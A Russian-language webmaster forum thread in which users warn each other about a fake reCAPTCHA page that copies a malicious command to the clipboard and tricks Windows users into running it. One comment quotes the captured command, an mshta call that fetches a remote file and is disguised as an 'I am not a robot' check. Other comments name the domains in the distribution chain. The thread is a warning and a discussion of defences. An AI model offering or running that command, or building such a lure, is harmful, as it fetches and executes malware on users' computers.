- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева

Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Соц инженерия не стоит на месте, теперь юзеры сами вирусы поставят на комп в пару кликов. На скрине пример не капчи, а затроянивания компьютера. Но соц инженерия красивая.
Сначала сайт подменяет буфер обмена (прописывает туда вредоносные команды), а потом пользователь делает все сам: 1) открывает консоль, 2) вставляет эти команды в консоль, 3) запускает их выполнение. И все, комп заражен вирусней. Сработает только на винде.
Просто будьте внимательны пользуясь интернетом.
Тоже видел сегодня такую, редирект на какой-то площадке был.
Но не обратил внимание, что там писано было. Так, а что в буфер кидается, не сохранили?
Тоже видел сегодня такую, редирект на какой-то площадке был.
Но не обратил внимание, что там писано было. Так, а что в буфер кидается, не сохранили?
mshta https://*****.click/riii2-b.accdb # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
mshta https://*****.click/riii2-b.accdb # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
Дыру в IE используют. Забавно, что у меня отключён компонент IE, а mshta открывается IE в отдельном окне всё равно.
Хотя там даже не уязвимости, MSHTA там VB скрипты можно исполнять. Но да, это уже напоминает "молдавский вирус".
Нашёл статью: Minimizing Malicious Script Execution
Там не только про mshta, но и про другие внутренние программки и как защититься от этого.
Сработает только на винде.
Правильно, в никсах задолбутся объяснять, что нужно сделать)))))) Пингвин - сила!
Но по факту, нужно быть очень не опытным пользователем идиотом, чтобы следовать такой инструкции.
А вот и распротранитель.
Далее цепочка: tofuturepubs.com
А потом http://a.exdynsrv.com/popunder1000.js
Подал жалобу на домен, посмотрим, что ответят. Возможно скажут: "Ой, не доказано, вопросы не к нам... мы тут не при чём."
Правильно, в никсах задолбутся объяснять, что нужно сделать)))))) Пингвин - сила!
Нет. Мошенники чуток не доработали. Надо было по юзерагенту определять что это юникс, а не винда. И 1 пункт надо просто Alt+F2 и тоже откроется консоль, а дальше все почти тоже самое.
Домены другие видел. Задействовано много доменов.
И конечная точка другая? Я думаю, что первичная только меняется, а основной скрипт всегда на a.exdynsrv.com/popunder1000.js